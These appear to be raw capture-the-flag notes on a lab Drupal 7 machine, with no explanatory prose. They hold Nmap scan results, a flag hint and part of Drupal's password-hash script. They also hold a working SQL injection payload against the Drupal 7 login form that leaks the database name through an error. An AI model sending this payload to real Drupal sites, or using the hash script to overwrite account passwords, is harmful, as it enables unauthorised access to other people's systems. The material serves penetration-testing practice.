Nmap scan report for 192.168.8.132 Host is up (0.00068s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0) | ssh-hostkey: | 1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA) | 2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA) |_ 256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA) 80/tcp open http Apache httpd 2.2.22 ((Debian)) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-title: Welcome to Drupal Site | Drupal Site |_http-server-header: Apache/2.2.22 (Debian) |_http-generator: Drupal 7 (http://drupal.org) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100024 1 35249/tcp status | 100024 1 42703/udp6 status | 100024 1 43760/udp status |_ 100024 1 45642/tcp6 status 35249/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:58:12:58 (VMware) Device type: general purpose Running: Linux 3.X OS CPE: cpe:/o:linux:linux_kernel:3 OS details: Linux 3.2 - 3.16 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds
name[0 or updatexml(0,concat(0x7e,database(),0x7e),0)%23]=bob&name[0]=a&pass=bug&form_build_id=form-hUM-lGJvIc5NEmlo46nu_0Z7cOfyfmk6BQjvIRD4goA&form_id=user_login_block&op=Log in
/** * * flag2 * Brute force and dictionary attacks aren't the * only ways to gain access (and you WILL need access). * What can you do with these credentials? * */
/** * Drupal hash script - to generate a hash from a plaintext password * * Check for your PHP interpreter - on Windows you'll probably have to * replace line 1 with * #!c:/program files/php/php.exe * * @param password1 [password2 [password3 ...]] * Plain-text passwords in quotes (or with spaces backslash escaped). */
if (version_compare(PHP_VERSION, "5.2.0", "<")) { $version = PHP_VERSION; echo<<<EOF ERROR: This script requires at least PHP version 5.2.0. You invoked it with PHP version {$version}. \n EOF; exit; }
if (in_array('--help', $_SERVER['argv']) || empty($_SERVER['argv'])) { echo<<<EOF Generate Drupal password hashes from the shell. Usage: {$script} [OPTIONS] "<plan-text password>" Example: {$script} "mynewpassword" All arguments are long options. --help Print this page. --root <path> Set the working directory for the script to the specified path. To execute this script this has to be the root directory of your Drupal installation, e.g. /home/www/foo/drupal (assuming Drupal running on Unix). Use surrounding quotation marks on Windows. "<password1>" ["<password2>" ["<password3>" ...]] One or more plan-text passwords enclosed by double quotes. The output hash may be manually entered into the {users}.pass field to change a password via SQL to a known value. To run this script without the --root argument invoke it from the root directory of your Drupal installation as ./scripts/{$script} \n EOF; exit; }
$passwords = array();
// Parse invocation arguments. while ($param = array_shift($_SERVER['argv'])) { switch ($param) { case'--root': // Change the working directory. $path = array_shift($_SERVER['argv']); if (is_dir($path)) { chdir($path); } break; default: // Add a password to the list to be processed. $passwords[] = $param; break; } }